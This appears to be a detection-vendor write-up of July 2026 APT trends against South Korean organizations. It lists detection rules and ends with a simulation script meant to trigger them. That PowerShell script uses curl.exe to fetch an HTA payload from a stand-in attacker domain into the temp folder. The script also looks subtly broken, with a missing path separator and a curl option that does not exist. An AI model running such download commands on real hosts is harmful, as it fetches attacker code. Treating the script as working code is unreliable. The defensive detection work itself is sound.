South Korea APT Threat Report: July 2026 Trends
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
AhnLab reports a rise in APT activity targeting South Korean organizations through spear-phishing campaigns. The attacks primarily rely on malicious LNK files to deliver payloads including PowerShell scripts, AutoIt scripts, and backdoors. Common techniques include persistence through Task Scheduler and data exfiltration via services such as Dropbox and PubNub.
Investigation
The investigation focused on APT infrastructure used against South Korean entities throughout July 2026. Analysts grouped the activity into several attack types, from A through G, based on delivery methods and functional characteristics. Researchers also identified behaviors including DLL side-loading and abuse of native Windows utilities such as curl.exe for payload retrieval.
Mitigation
Users should verify sender identities and avoid opening attachments received from unknown or untrusted sources. Organizations should keep operating systems and web browsers updated with the latest security patches. Maintaining current antivirus and endpoint protection solutions such as V3 is also recommended.
Response
If suspicious LNK files or unauthorized Task Scheduler entries are detected, incident responders should isolate the affected host immediately. Memory forensics should be performed to identify injected backdoors or malicious DLLs. Network logs should also be reviewed for unusual outbound connections to file-hosting services or command-and-control channels such as PubNub.
Attack Flow
We are still updating this part.
Detections
Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
Suspicious CURL Usage (via cmdline)
Suspicious Scheduled Task (via audit)
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
IOCs (HashMd5) to detect: July 2026 Threat Trend Report on APT Attacks (South Korea)
Curl.Exe Used to Download and Execute Malicious Files [Windows Sysmon]
Detect Malicious PowerShell Commands within LNK Files [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary intends to use
curl.exeto download a malicious HTA file to the%TEMP%directory to establish a foothold. To test if the current detection logic is working (as it specifically looks for the words “download” or “execute”), the attacker will use a command line that explicitly includes these words as part of a fake argument or description, simulating a poorly constructed script or a specific attempt to mimic the pattern the SOC is looking for. -
Regression Test Script:
# Simulate an adversary using curl with the specific keywords required by the rule $tempPath = $env:TEMPmalicious.hta $url = "http://attacker-controlled-domain.com/payload.hta" # This command is crafted specifically to trigger the 'contains' logic of the rule # by including the words 'download' and 'execute' in the command line string. Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'" -
Cleanup Commands:
# Remove the dummy file created during simulation if (Test-Path "$env:TEMPmalicious.hta") { Remove-Item -Path "$env:TEMPmalicious.hta" -Force }